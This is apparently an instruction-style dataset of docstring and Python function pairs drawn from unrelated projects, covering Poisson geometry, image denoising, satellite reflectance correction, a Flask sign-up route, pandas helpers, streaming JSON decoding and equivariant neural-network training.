+ pair_E_P.append(-self.coords[2] * bivector[e])
+ pair_E_P = sym.sympify('1/2') * sum(pair_E_P)
+ hessian_pair_E_P = sym.sympify('1/2') * sym.hessian(pair_E_P, self.coords[:3])
+ rank_hess = hessian_pair_E_P.rank()
+ egvals_hess = [sym.re(e) for e in hessian_pair_E_P.eigenvals(rational=True, multiple=True)]
+ sign_hess = sum([sym.sign(e) for e in egvals_hess])
+ if self.is_unimodular_homogeneous(bivector):
+ if sym.simplify(rank_hess - 3) == 0:
+ if sym.simplify(sym.Abs(sign_hess) - 3) == 0:
+ if latex:
+ return sym.latex({
+ (1, 2): F'{self.coords[2]}',
+ (1, 3): F'-{self.coords[1]}',
+ (2, 3): F'{self.coords[0]}'
+ })
+ return {
+ (1, 2): F'{self.coords[2]}',
+ (1, 3): F'-{self.coords[1]}',
+ (2, 3): F'{self.coords[0]}',
+ }
+ if sym.simplify(sym.Abs(sign_hess) - 1) == 0:
+ if latex:
+ return sym.latex({
+ (1, 2): F'-{self.coords[2]}',
+ (1, 3): F'-{self.coords[1]}',
+ (2, 3): F'{self.coords[0]}',
+ })
+ return {
+ (1, 2): F'-{self.coords[2]}',
+ (1, 3): F'-{self.coords[1]}',
+ (2, 3): F'{self.coords[0]}',
+ }
+ if sym.simplify(rank_hess - 2) == 0:
+ if sym.simplify(sym.Abs(sign_hess) - 2) == 0:
+ if latex:
+ return sym.latex({(1, 3): F'-{self.coords[1]}', (2, 3): F'{self.coords[0]}'})
+ return {(1, 3): F'-{self.coords[1]}', (2, 3): F'{self.coords[0]}'}
+ if sign_hess == 0:
+ if latex:
+ return sym.latex({(1, 3): F'{self.coords[1]}', (2, 3): F'{self.coords[0]}'})
+ return {(1, 3): F'{self.coords[1]}', (2, 3): F'{self.coords[0]}'}
+ if sym.simplify(rank_hess - 1) == 0:
+ if latex:
+ return sym.latex({(2, 3): F'{self.coords[0]}'})
+ return {(2, 3): F'{self.coords[0]}'}
+ if rank_hess == 0:
+ if latex:
+ return sym.latex({(1, 3): F'{self.coords[0]}', (2, 3): F'{self.coords[1]}'})
+ return {(1, 3): F'{self.coords[0]}', (2, 3): F'{self.coords[1]}'}
+ if sym.simplify(rank_hess - 2) == 0:
+ if sym.simplify(sym.Abs(sign_hess) - 2) == 0:
+ if latex:
+ return sym.latex({
+ (1, 3): F'{self.coords[0]} - 4*a*{self.coords[1]}',
+ (2, 3): F'4*a*{self.coords[0]} + {self.coords[1]}',
+ })
+ return {
+ (1, 3): F'{self.coords[0]} - 4*a*{self.coords[1]}',
+ (2, 3): F'4*a*{self.coords[0]} + {self.coords[1]}',
+ }
+ if sign_hess == 0:
+ if latex:
+ return sym.latex({
+ (1, 3): F'{self.coords[0]} + 4*a*{self.coords[1]}',
+ (2, 3): F'4*a*{self.coords[0]} + {self.coords[1]}'
+ })
+ return {
+ (1, 3): F'{self.coords[0]} + 4*a*{self.coords[1]}',
+ (2, 3): F'4*a*{self.coords[0]} + {self.coords[1]}'
+ }
+ if sym.simplify(rank_hess - 1) == 0:
+ if latex:
+ return sym.latex({(1, 3): f'{self.coords[0]}', (2, 3): f'4*{self.coords[0]} + {self.coords[1]}'})
+ return {(1, 3): f'{self.coords[0]}', (2, 3): f'4*{self.coords[0]} + {self.coords[1]}'}
+ return {}
+[INST] Determines if two Lie-Poisson bivector fields on R^3 are isomorphic or not.
+Parameters. [/INST] def isomorphic_lie_poisson_R3(self, bivector_1, bivector_2):
+ normal_1 = self.linear_normal_form_R3(bivector_1)
+ normal_2 = self.linear_normal_form_R3(bivector_2)
+ if not bool(normal_1) and not bool(normal_2):
+ return True
+ if not isinstance(normal_1, dict):
+ return normal_1
+ if not isinstance(normal_2, dict):
+ return normal_2
+ if len(normal_1) - len(normal_2) != 0:
+ return False
+ if len(normal_1) - 1 == 0 and len(normal_2) - 1 == 0:
+ return True
+ normal_1 = sym.sympify(normal_1)
+ normal_2 = sym.sympify(normal_2)
+ if len(normal_1) - 2 == 0 and len(normal_2) - 2 == 0:
+ compare = [1 for e in normal_1 if sym.simplify(normal_1[e] - normal_2[e]) != 0]
+ return True if len(compare) == 0 else False
+ if len(normal_1) - 3 == 0 and len(normal_2) - 3 == 0:
+ return True if sym.simplify(normal_1[(1, 2)] - normal_2[(1, 2)]) == 0 else False
+ return False
+[INST] Calculates de Schouten-Nijenhuis bracket of a given bivector field with himself, that is [P,P]
+where [,] denote the Schouten bracket for multivector fields.
+
+Parameters. [/INST] def jacobiator(self, bivector, latex=False):
+ jac = self.coboundary_operator(bivector, bivector, latex=latex)
+ if not isinstance(jac, dict):
+ return jac
+ return jac
+[INST] Calculates de Schouten-Nijenhuis bracket of a given bivector field with himself,
+that is calculates [P,P]_SN.
+
+Parameters. [/INST] def is_poisson_bivector(self, bivector):
+ jac = self.coboundary_operator(bivector, bivector)
+ if not isinstance(jac, dict):
+ return jac
+ return False if bool(jac) else True
+[INST] Check if a vector field is a Poisson vector field of a given Poisson bivector field, that is calculate if
+[Z,P] = 0, where Z is vector_field variable and P is bivector variable.
+
+Parameters. [/INST] def is_poisson_vf(self, bivector, vector_field):
+ sch_biv_vf = self.coboundary_operator(bivector, vector_field)
+ if not isinstance(sch_biv_vf, dict):
+ return sch_biv_vf
+ return False if bool(sch_biv_vf) else True
+[INST] Check if the sum of two Poisson bivector fields P1 and P2 is a Poisson bivector field, that is
+calculate if [P1,P2] = 0
+
+Parameters. [/INST] def is_poisson_pair(self, bivector_1, bivector_2):
+ sch_biv1_biv2 = self.coboundary_operator(bivector_1, bivector_2)
+ if not isinstance(sch_biv1_biv2, dict):
+ return sch_biv1_biv2
+ return False if bool(sch_biv1_biv2) else True
+[INST] scan event, It will be triggered when you scan the qrcode to login.
+And it will not be triggered when you have logined. [/INST] async def on_scan(self, status: ScanStatus, qr_code: Optional[str] = None,
+ data: Optional[str] = None):
+ contact = self.Contact.load(self.contact_id)
+ await contact.ready()
+ print(f'user <{contact}> scan status: {status.name} , '
+ f'qr_code: {qr_code}')
+[INST] Calculate the n-th discrete difference along the given axis.. [/INST] def diff(a, n=1, axis=-1):
+ a = cupy.asanyarray(a)
+ nd = a.ndim
+ axis = normalize_axis_index(axis, nd)
+ slice1 = [slice(None)] * nd
+ slice2 = [slice(None)] * nd
+ slice1[axis] = slice(1, None)
+ slice2[axis] = slice(None, -1)
+ slice1 = tuple(slice1)
+ slice2 = tuple(slice2)
+ op = cupy.not_equal if a.dtype == cupy.bool_ else cupy.subtract
+ for _ in range(n):
+ a = op(a[slice1], a[slice2])
+ return a
+[INST] Perform total-variation denoising on n-dimensional images.
+Parameters
+
+image : ndarray of ints, uints or floats
+Input data to be denoised. `image` can be of any numeric type,
+but it is cast into an ndarray of floats for the computation
+of the denoised image.
+weight : float, optional
+Denoising weight. The greater `weight`, the more denoising (at
+the expense of fidelity to `input`).
+eps : float, optional
+Relative difference of the value of the cost function that
+determines the stop criterion. The algorithm stops when.
+
+
+
+n_iter_max : int, optional
+Maximal number of iterations used for the optimization.
+multichannel : bool, optional
+Apply total-variation denoising separately for each channel. This
+option should be true for color images, otherwise the denoising is
+also applied in the channels dimension.
+
+Returns
+
+out : ndarray
+Denoised image.
+
+Notes
+
+Make sure to set the multichannel parameter appropriately for color images.
+
+
+
+The principle of total variation denoising is to minimize the
+total variation of the image, which can be roughly described as
+the integral of the norm of the image gradient. Total variation
+denoising tends to produce "cartoon-like" images, that is,
+piecewise-constant images.
+
+This code is an implementation of the algorithm of Rudin, Fatemi and Osher
+that was proposed by Chambolle in [1]_.
+
+References
+
+[1] A. Chambolle, An algorithm for total variation minimization and
+applications, Journal of Mathematical Imaging and Vision,
+Springer, 2004, 20, 89-97.
+
+Examples
+
+2D example on astronaut image.
+
+
+
+3D example on synthetic data.. [/INST] def denoise_tv_chambolle(image, weight=0.1, eps=2.e-4, n_iter_max=200,
+ multichannel=False):
+ xp = get_array_module(image)
+ im_type = image.dtype
+ if not im_type.kind == 'f':
+ raise NotImplementedError(
+ "please convert input to floating point type")
+ if multichannel:
+ out = xp.zeros_like(image)
+ for c in range(image.shape[-1]):
+ out[..., c] = _denoise_tv_chambolle_nd(image[..., c], weight, eps,
+ n_iter_max, xp=xp)
+ else:
+ out = _denoise_tv_chambolle_nd(image, weight, eps, n_iter_max, xp=xp)
+ return out
+[INST] Estimate toa reflectance from radiometric data
+ignoring atmospheric, topographic and BRDF effects
+
+Parameters
+
+radata : ndarray shape (nbands, ny, nx)
+radiance data
+mtdFile : str
+path to IMD metadata file
+band_ids : sequence of int
+band IDs
+
+Returns
+
+ndarray
+reflectance. [/INST] def toa_reflectance(radata, mtdFile, band_ids):
+ return reflectance.radiance_to_reflectance(radata, mtdFile, band_ids=band_ids)
+[INST] Calculate TOA reflectance
+Parameters
+
+infiles : list of str or str
+paths to Landsat 8 band files
+or URIs for members in TAR file
+or path to TAR file
+outfile : str
+path to save output to
+mtdfile : str
+path to metadata file
+bands : list of int
+bands to extract from TAR file
+or bands that the URIs correspond to. [/INST] def toa_reflectance(infiles, outfile, mtdfile, bands):
+ bandfiles = l8utils.get_bandfiles(infiles, bands)
+ reflectance.calculate_landsat_reflectance(
+ src_path=bandfiles,
+ src_mtl=mtdfile,
+ dst_path=outfile,
+ rescale_factor=None,
+ creation_options={},
+ bands=bands,
+ dst_dtype='float32',
+ processes=1,
+ pixel_sunangle=True)
+[INST] DOS correction using histogram with 2048 bins since WV2 has 11 bit radiometric resolution. [/INST] def do_dos(data):
+ nonzero = data != 0
+ n = np.sum(nonzero)
+ tiny_fraction = n - n * 0.999999
+ nbands = data.shape[0]
+ dosDN = np.zeros(nbands)
+ for i in range(nbands):
+ hist, edges = np.histogram(
+ data[i], bins=2048, range=(1, 2048), density=False)
+ for k in range(1, len(hist)):
+ if hist[k] - hist[i - 1] > tiny_fraction:
+ dosDN[i] = k - 1
+ break
+ return dosDN
+[INST] Adjacency correction
+Parameters
+
+
+
+Sources
+
+Following Ouaidrari & Vermote 1999: Operational Atmospheric Correction of Landsat TM Data. [/INST] def adjacency_correction(refl, view_z, tau, T_dir, T_dif, pixel_size, radius=1.0):
+ rolled = False
+ if np.ndim(view_z) == 1:
+ rolled = True
+ refl = np.rollaxis(refl, 0, 3)
+ u_v = np.cos(np.radians(view_z))
+ T = 1 - ((1 - T_dif) + (1 - T_dir))
+ mask = np.isnan(refl)
+ refl[mask] = np.interp(np.flatnonzero(mask), np.flatnonzero(~mask), refl[~mask])
+ sigma = radius / pixel_size
+ adjRefl = scipy.ndimage.filters.gaussian_filter(refl, sigma)
+ t_d = T_dif - np.exp(-tau / u_v)
+ refl = (refl * T - adjRefl * t_d) / np.exp(-tau / u_v)
+ refl[refl < 0.0] = 0.0
+ refl[mask] = np.nan
+ if rolled:
+ return np.rollaxis(refl, 2, 0)
+ else:
+ return refl
+[INST] Apply radiometric correction to Pleadis image. [/INST] def dn_to_radiance(dndata, mtdFile, band_ids):
+ metadata = plparser.parse_metadata(mtdFile)
+ gain_bias = metadata['calibration_values']
+ gain, bias = (np.array(gain_bias[key])[band_ids] for key in ['gain', 'bias'])
+ radata = np.zeros(dndata.shape, dtype='float32')
+ with np.errstate(invalid='ignore'):
+ for i in range(radata.shape[0]):
+ radata[i, ...] = dndata[i] / gain[i] + bias[i]
+ radata[radata < 0] = 0
+ return radata
+[INST] Get target of sensors that have similar sets of bands. [/INST] def sensor_group_bands(sensor):
+ for target in ['WV', 'PHR', 'L7', 'L8', 'S2', 'WV_4band']:
+ if sensor_is(sensor, target):
+ return target
+ raise ValueError('Unable to get sensor group for \'%s\'.'.format(sensor))
+[INST] Sets up Py6S instance and returns job for run_sixs_for_wavelength
+Parameters
+
+rcurves_dict : dict
+sensor response curve parameters
+sixs_params : dict
+keyword arguments for setup_sixs
+
+Returns
+
+list of tuples (SixS, float, float, ndarray)
+SixS instance
+start and env wavelengths
+sensor response curve. [/INST] def generate_jobs(rcurves_dict, sixs_params):
+ mysixs = setup_sixs(**sixs_params)
+ jobs = []
+ for rcurve in rcurves_dict['rcurves']:
+ s = copy.deepcopy(mysixs)
+ s.wavelength = Py6S.Wavelength(rcurves_dict['start_wv'], rcurves_dict['end_wv'], rcurve)
+ jobs.append((s, ))
+ return jobs
+[INST] Run sixs for a specific wavelength
+Parameters
+
+args : tuple
+initialized SixS instance
+[additional args passed through]
+
+Returns
+
+dict
+correction parameters
+list of float
+adjacency correction parameters
+list
+arguments passed through. [/INST] def run_sixs_job(args):
+ mysixs = args[0]
+ moreargs = args[1:]
+ mysixs.run()
+ xdict = {
+ 'xa': mysixs.outputs.coef_xa,
+ 'xb': mysixs.outputs.coef_xb,
+ 'xc': mysixs.outputs.coef_xc}
+ adjcorr_params = [
+ mysixs.geometry.view_z,
+ mysixs.outputs.optical_depth_total.total,
+ mysixs.outputs.transmittance_global_gas.upward,
+ mysixs.outputs.transmittance_total_scattering.upward]
+ return (xdict, adjcorr_params, moreargs)
+[INST] Compute TOA radiance from DigitalGlobe digital numbers
+Parameters
+
+dndata : ndarray shape (nbands, ny, nx)
+digital numbers data
+mtdFile : str
+path to IMD metadata file
+band_ids : sequence of int
+band IDs. [/INST] def dn_to_radiance(dndata, mtdFile, band_ids):
+ radata = radiance.dn_to_radiance(dndata, mtdFile, band_ids=band_ids)
+ with np.errstate(invalid='ignore'):
+ radata[radata < 0] = 0
+ return radata
+[INST] Creates a new user and logs them in. [/INST] def sign_up():
+ form = SignUpForm()
+ form['csrf_token'].data = request.cookies['csrf_token']
+ err = ''
+ data = request.get_json()
+ if data['password'] != data['confirm_password']:
+ err='Password and confirm password must match.'
+ if form.validate_on_submit():
+ if err == '':
+ user = User(
+ username=form.data['username'],
+ email=form.data['email'],
+ firstName=form.data['firstName'],
+ lastName=form.data['lastName'],
+ password=form.data['password'],
+ profileImg=form.data['profileImg']
+ )
+ db.session.add(user)
+ db.session.commit()
+ login_user(user)
+ return user.to_dict()
+ errors = validation_errors_to_error_messages(form.errors)
+ error_msgs = [txt.split(': ')[1]
+ for txt in validation_errors_to_error_messages(form.errors)]
+ if err:
+ error_msgs.append(err)
+ return {'errors': error_msgs}, 401
+[INST] Return length of string (number of word, seperated by Space).. [/INST] def string_len_w(string):
+ string_str = str(string)
+ string_list = string_str.split()
+ string_len = len(string_list)
+ return string_len
+[INST] Making a list based on entry in one category and if missing adds entry of another Column. [/INST] def helper_list():
+ empty = []
+ for i in range(df.shape[0]):
+ if df["category_parent_id"][i] != 0:
+ empty.append(df["category_parent_id"][i])
+ else:
+ empty.append(df["category_id"][i])
+ return empty
+[INST] based on key value in a column, column with value is added as a column and updated dataframe is returned.. [/INST] def add_parent_name(df, column_name1, column_name2, dictionary):
+ df[column_name1] = df[column_name2].apply(lambda x: dictionary.get(x))
+ return df
+[INST] Calculating difference between two timepoints and returns it in days. [/INST] def duration(deadline, launched_at):
+ duration = deadline - launched_at
+ duration_complete = dt.timedelta(seconds=duration)
+ return duration_complete.days
+[INST] Converts a Column based on given exchange rate, rounds it to two decimal spaces
+and returns updated dataframe, e.g.. [/INST] def usd_convert_goal(df, column_name, exchange_rate):
+ df[column_name] = (df[column_name] * df[exchange_rate]).round(2)
+ return df
+[INST] Creating dataframe and dropping all duplicates, based on a column_name
+and keep the last ("newest") duplicate. [/INST] def drop_duplicates(df, column_name):
+ df = df.drop_duplicates(subset=['id'], keep='last')
+ return df
+[INST] Only create new csv if not already done. [/INST] def read_files():
+ if not Path("./data/Kickstarter_merged.csv").exists():
+ all_files = glob.glob(os.path.join(path, "Kickstarter*.csv"))
+ df_from_each_file = (pd.read_csv(f, sep=',') for f in all_files)
+ df_merged = pd.concat(df_from_each_file, ignore_index=True)
+ df_merged.to_csv('./data/Kickstarter_merged.csv')
+ return pd.read_csv('./data/Kickstarter_merged.csv', index_col=0)
+[INST] Almost identical to ``json.load``, except that it produces and iterator.
+Which returns zero or more objects that can be decoded by JSON documents
+separated by whitespace, or the given string or regex.
+
+``separator`` defaults to zero or more whitespace characters. You can
+provide a different, but fixed width, separator if desired.
+
+
+
+
+
+``max_bufsize`` limit the size of the buffer used to hold unparsed
+parts of the document. Must be at least as large as the largest document
+in the stream, or a JSONDecodeError will be raised.. [/INST] def load(
+ fp, *, cls=None, object_hook=None, parse_float=None,
+ parse_int=None, parse_constant=None, object_pairs_hook=None,
+ separator=None,
+ bufsize=1048576,
+ max_bufsize=float('inf'),
+ stream_offset=0,
+ **kw
+):
+ if not hasattr(fp, 'encoding'):
+ fp = io.TextIOWrapper(fp, encoding='utf8')
+ cls, kw = _parse_kw(
+ cls, object_hook, parse_float, parse_int, parse_constant, object_pairs_hook, kw
+ )
+ next_pos, pos = get_first_pos_and_next_pos_func(separator)
+ return iter(DecodeStream(
+ fp,
+ cls(**kw),
+ next_pos,
+ pos,
+ kw.get('parse_int'),
+ kw.get('parse_float'),
+ bufsize,
+ max_bufsize,
+ stream_offset,
+ ))
+[INST] Almost identical to ``json.loads``, except that it produces and iterator.
+Which returns zero or more objects that are decoded from JSON documents
+separated by whitespace, or the given string or regex.
+
+Always decodes bytes and bytearrays as UTF-8. Manually decode if this is
+not desired.
+
+
+
+``separator`` defaults to zero or more whitespace characters. You can
+provide a different, but fixed width, separator if desired.. [/INST] def loads(
+ s, *, cls=None, object_hook=None, parse_float=None,
+ parse_int=None, parse_constant=None, object_pairs_hook=None,
+ pos=0,
+ separator=None,
+ **kw
+):
+ if isinstance(s, str):
+ if s.startswith('\ufeff'):
+ raise JSONDecodeError("Unexpected UTF-8 BOM (decode using utf-8-sig)",
+ s, 0)
+ else:
+ if not isinstance(s, (bytes, bytearray)):
+ raise TypeError(f'the JSON object must be str, bytes or bytearray, '
+ f'not {s.__class__.__name__}')
+ s = s.decode('utf8')
+ cls, kw = _parse_kw(
+ cls, object_hook, parse_float, parse_int, parse_constant, object_pairs_hook, kw
+ )
+ next_pos, pos = get_first_pos_and_next_pos_func(separator)
+ return decode_stacked(s, cls(**kw), next_pos, pos)
+[INST] Read enough data from the stream until:
+the start of the next object is found (return true)
+the delimiter check fails (raise an error)
+the stream is empty (return false). [/INST] def next_pos(self):
+ while True:
+ new_pos = self.next_pos_helper(self.partial_doc, self.pos)
+ if new_pos is None:
+ if self._try_read(''):
+ continue
+ return False
+ else:
+ self.pos = new_pos
+ return True
+[INST] Reads new data, and adds to any unparsed data.
+Returns true if new data was read. [/INST] def _try_read(self, remaining_buffer):
+ if len(remaining_buffer) + self.bufsize > self.max_bufsize:
+ to_read = self.max_bufsize - len(remaining_buffer)
+ if to_read <= 0:
+ raise ValueError('max buffer size exceeded')
+ else:
+ to_read = self.bufsize
+ new = self.stream.read(to_read)
+ self.stream_offset += len(self.partial_doc) - len(remaining_buffer)
+ self.partial_doc = remaining_buffer + new
+ self.pos = 0
+ return bool(new)
+[INST] Trains a model on MNIST and evaluates its performance on MNIST, Flip-MNIST and 90Rot-MNIST.. [/INST] def train(config=None):
+ with wandb.init(config=config, project="cheblienet"):
+ config = wandb.config
+ wandb.log({"dataset": "cifar10"})
+ wandb.log(vars(args))
+ device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu")
+ if args.pool:
+ if args.anisotropic:
+ graph_lvl0 = SE2GEGraph(
+ [8, 8, config.ntheta],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi_0),
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl1 = SE2GEGraph(
+ [16, 16, config.ntheta],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi_1),
+ path_to_graph=args.path_to_graph,
+ )
+ else:
+ graph_lvl0 = R2GEGraph(
+ [8, 8, 1],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi_0),
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl1 = R2GEGraph(
+ [16, 16, 1],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi_1),
+ path_to_graph=args.path_to_graph,
+ )
+ if args.anisotropic:
+ graph_lvl2 = SE2GEGraph(
+ [32, 32, config.ntheta],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi_2),
+ path_to_graph=args.path_to_graph,
+ )
+ else:
+ graph_lvl2 = R2GEGraph(
+ [32, 32, 1],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi_2),
+ path_to_graph=args.path_to_graph,
+ )
+ model = WideResSE2GEChebNet(
+ in_channels=3,
+ out_channels=10,
+ kernel_size=config.kernel_size,
+ graph_lvl0=graph_lvl0 if args.pool else graph_lvl2,
+ graph_lvl1=graph_lvl1 if args.pool else None,
+ graph_lvl2=graph_lvl2 if args.pool else None,
+ res_depth=args.res_depth,
+ widen_factor=args.widen_factor,
+ reduction=args.reduction if args.pool else None,
+ ).to(device)
+ wandb.log({"capacity": capacity(model)})
+ optimizer = Adam(model.parameters(), lr=args.lr)
+ train_loader, _ = get_train_val_loaders(
+ "cifar10",
+ num_layers=config.ntheta,
+ batch_size=args.batch_size,
+ val_ratio=0.0,
+ path_to_data=args.path_to_data,
+ )
+ (classic_test_loader, rotated_test_loader, flipped_test_loader,) = get_equiv_test_loaders(
+ "cifar10", num_layers=config.ntheta, batch_size=args.batch_size, path_to_data=args.path_to_data
+ )
+ trainer = create_supervised_trainer(
+ graph=graph_lvl2,
+ model=model,
+ optimizer=optimizer,
+ loss_fn=nll_loss,
+ device=device,
+ prepare_batch=prepare_batch,
+ )
+ ProgressBar(persist=False, desc="Training").attach(trainer)
+ classic_metrics = {"classic_test_accuracy": Accuracy(), "classic_test_loss": Loss(nll_loss)}
+ rotated_metrics = {"rotated_test_accuracy": Accuracy(), "rotated_test_loss": Loss(nll_loss)}
+ flipped_metrics = {"flipped_test_accuracy": Accuracy(), "flipped_test_loss": Loss(nll_loss)}
+ classic_evaluator = create_supervised_evaluator(
+ graph=graph_lvl2,
+ model=model,
+ metrics=classic_metrics,
+ device=device,
+ prepare_batch=prepare_batch,
+ )
+ ProgressBar(persist=False, desc="Evaluation").attach(classic_evaluator)
+ rotated_evaluator = create_supervised_evaluator(
+ graph=graph_lvl2,
+ model=model,
+ metrics=rotated_metrics,
+ device=device,
+ prepare_batch=prepare_batch,
+ )
+ ProgressBar(persist=False, desc="Evaluation").attach(rotated_evaluator)
+ flipped_evaluator = create_supervised_evaluator(
+ graph=graph_lvl2,
+ model=model,
+ metrics=flipped_metrics,
+ device=device,
+ prepare_batch=prepare_batch,
+ )
+ ProgressBar(persist=False, desc="Evaluation").attach(flipped_evaluator)
+ trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, classic_evaluator, classic_test_loader)
+ trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, rotated_evaluator, rotated_test_loader)
+ trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, flipped_evaluator, flipped_test_loader)
+ trainer.run(train_loader, max_epochs=args.max_epochs)
+[INST] Extra representation of the Chebyschev convolutional layer.. [/INST] def extra_repr(self):
+ s = "in_channels={in_channels}, out_channels={out_channels}, kernel_size={kernel_size}"
+ if self.bias is None:
+ s += ", bias=False"
+ else:
+ s += ", bias=True"
+ return s.format(**self.__dict__)
+[INST] Returns a new tensor corresponding to matrix formulation of the given input tensors representing
+SO(3) group elements.. [/INST] def so3_matrix(alpha, beta, gamma, device=None):
+ R_alpha_z = rotation_matrix(alpha, "z", device)
+ R_beta_y = rotation_matrix(beta, "y", device)
+ R_gamma_z = rotation_matrix(gamma, "z", device)
+ return R_gamma_z @ R_beta_y @ R_alpha_z
+[INST] Returns a new tensor corresponding to the inverse of the group elements in matrix formulation.. [/INST] def s2_inverse(G):
+ return torch.transpose(G, -1, -2)
+[INST] Returns a new tensor corresponding to the inverse of the group elements in matrix formulation.. [/INST] def so3_inverse(G):
+ return torch.transpose(G, -1, -2)
+[INST] Return new tensors corresponding to alpha, beta and gamma attributes of the group elements specified by the
+S2 group elements in matrix formulation.. [/INST] def s2_element(G):
+ gamma = torch.atan2(G[..., 1, 0], G[..., 0, 0])
+ beta = torch.acos(G[..., 2, 2])
+ return beta, gamma
+[INST] Return new tensors corresponding to alpha, beta and gamma attributes of the group elements specified by the
+so3 group elements in matrix formulation.. [/INST] def so3_element(G):
+ gamma = torch.atan2(G[..., 1, 2], G[..., 0, 2])
+ sin = torch.sin(gamma)
+ cos = torch.cos(gamma)
+ beta = torch.atan2(cos * G[..., 0, 2] + sin * G[..., 1, 2], G[..., 2, 2])
+ alpha = torch.atan2(-sin * G[..., 0, 0] + cos * G[..., 1, 0], -sin * G[..., 0, 1] + cos * G[..., 1, 1])
+ return alpha, beta, gamma
+[INST] Returns a new tensor containing the riemannnian logarithm of the group elements in matrix formulation.. [/INST] def s2_log(G):
+ beta, gamma = s2_element(G)
+ G = so3_matrix(-gamma, beta, gamma)
+ theta = torch.acos(((G[..., 0, 0] + G[..., 1, 1] + G[..., 2, 2]) - 1) / 2)
+ c1 = 0.5 * theta / torch.sin(theta) * (G[..., 2, 1] - G[..., 1, 2])
+ c2 = 0.5 * theta / torch.sin(theta) * (G[..., 0, 2] - G[..., 2, 0])
+ c3 = torch.zeros_like(c1)
+ mask = theta == 0.0
+ c1[mask] = 0.5 * G[mask, 2, 1] - G[mask, 1, 2]
+ c2[mask] = 0.5 * G[mask, 0, 2] - G[mask, 2, 0]
+ mask = theta == math.pi
+ c1[mask] = math.pi
+ c2[mask] = 0.0
+ c = torch.stack((c1, c2, c3), dim=-1).unsqueeze(2)
+ return c
+[INST] Returns a new tensor containing the riemannnian logarithm of the group elements in matrix formulation.. [/INST] def so3_log(G):
+ theta = torch.acos(((G[..., 0, 0] + G[..., 1, 1] + G[..., 2, 2]) - 1) / 2)
+ c1 = 0.5 * theta / torch.sin(theta) * (G[..., 2, 1] - G[..., 1, 2])
+ c2 = 0.5 * theta / torch.sin(theta) * (G[..., 0, 2] - G[..., 2, 0])
+ c3 = 0.5 * theta / torch.sin(theta) * (G[..., 1, 0] - G[..., 0, 1])
+ mask = theta == 0.0
+ c1[mask] = 0.5 * G[mask, 2, 1] - G[mask, 1, 2]
+ c2[mask] = 0.5 * G[mask, 0, 2] - G[mask, 2, 0]
+ c3[mask] = 0.5 * G[mask, 1, 0] - G[mask, 0, 1]
+ mask = theta == math.pi
+ c1[mask] = math.pi
+ c2[mask] = 0.0
+ c3[mask] = 0.0
+ c = torch.stack((c1, c2, c3), dim=-1).unsqueeze(2)
+ return c
+[INST] Return the squared riemannian distances between group elements in matrix formulation.. [/INST] def s2_riemannian_sqdist(Gg, Gh, Re):
+ G = torch.matmul(s2_inverse(Gg), Gh)
+ return weighted_norm(s2_log(G), Re)
+[INST] Returns the squared riemannian distances between group elements in matrix formulation.. [/INST] def so3_riemannian_sqdist(Gg, Gh, Re):
+ G = torch.matmul(so3_inverse(Gg), Gh)
+ alpha, beta, gamma = so3_element(G)
+ sqdist1 = weighted_norm(so3_log(so3_matrix(alpha, beta, gamma)), Re)
+ sqdist2 = weighted_norm(so3_log(so3_matrix(alpha - math.pi, beta, gamma)), Re)
+ sqdist3 = weighted_norm(so3_log(so3_matrix(alpha + math.pi, beta, gamma)), Re)
+ sqdist, _ = torch.stack((sqdist1, sqdist2, sqdist3)).min(dim=0)
+ return sqdist
+[INST] Make the graph undirected, that is create an inverse edge for each edge.. [/INST] def to_undirected(edge_index, edge_sqdist, edge_weight=None, num_vertices=None, max_sqdist=None, self_loop=False):
+ num_vertices = num_vertices or edge_index.max() + 1
+ sqdist_matrix = torch.sparse.FloatTensor(edge_index, edge_sqdist, torch.Size((num_vertices, num_vertices))).to_dense()
+ mask = sqdist_matrix.t() == sqdist_matrix
+ if max_sqdist is not None:
+ mask &= sqdist_matrix <= max_sqdist
+ undirected_sqdist_matrix = torch.zeros_like(sqdist_matrix)
+ undirected_sqdist_matrix[mask] = sqdist_matrix[mask]
+ undirected_sqdist_matrix = undirected_sqdist_matrix.to_sparse()
+ if edge_weight is not None:
+ weight_matrix = torch.sparse.FloatTensor(edge_index, edge_weight, torch.Size((num_vertices, num_vertices))).to_dense()
+ undirected_weight_matrix = torch.zeros_like(weight_matrix)
+ undirected_weight_matrix[mask] = weight_matrix[mask]
+ undirected_weight_matrix = undirected_weight_matrix.to_sparse()
+ edge_index = undirected_sqdist_matrix.indices()
+ edge_sqdist = undirected_sqdist_matrix.values()
+ if edge_weight is not None:
+ edge_weight = undirected_weight_matrix.values()
+ if self_loop:
+ if edge_weight is None:
+ return edge_index, edge_sqdist
+ return edge_index, edge_sqdist, edge_weight
+ return remove_self_loops(edge_index, edge_sqdist, edge_weight)
+[INST] Removes all self-loop in the graph.. [/INST] def remove_self_loops(edge_index, edge_sqdist, edge_weight=None):
+ mask = edge_index[0] != edge_index[1]
+ if edge_weight is None:
+ return edge_index[..., mask], edge_sqdist[mask]
+ return edge_index[..., mask], edge_sqdist[mask], edge_weight[mask]
+[INST] Add a self-loop for each vertex of the graph.. [/INST] def add_self_loops(edge_index, edge_attr, weight=1.0):
+ self_loop_index = edge_index[0].unique().unsqueeze(0).repeat(2, 1)
+ self_loop_attr = weight * torch.ones(self_loop_index.shape[1])
+ edge_index = torch.cat((self_loop_index, edge_index), dim=1)
+ edge_attr = torch.cat((self_loop_attr, edge_attr))
+ return edge_index, edge_attr
+[INST] U-net-like model training on ClimateNet for the segmentation of extreme meteorogolical events.. [/INST] def train(config=None):
+ with wandb.init(config=config, project="cheblienet"):
+ config = wandb.config
+ wandb.log({"dataset": "artc"})
+ wandb.log(vars(args))
+ device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu")
+ if args.anisotropic:
+ graph_lvl0 = SO3GEGraph(
+ size=[12, config.nalpha],
+ sigmas=(1.0, config.eps, config.xi_0),
+ K=config.K,
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl1 = SO3GEGraph(
+ size=[42, config.nalpha],
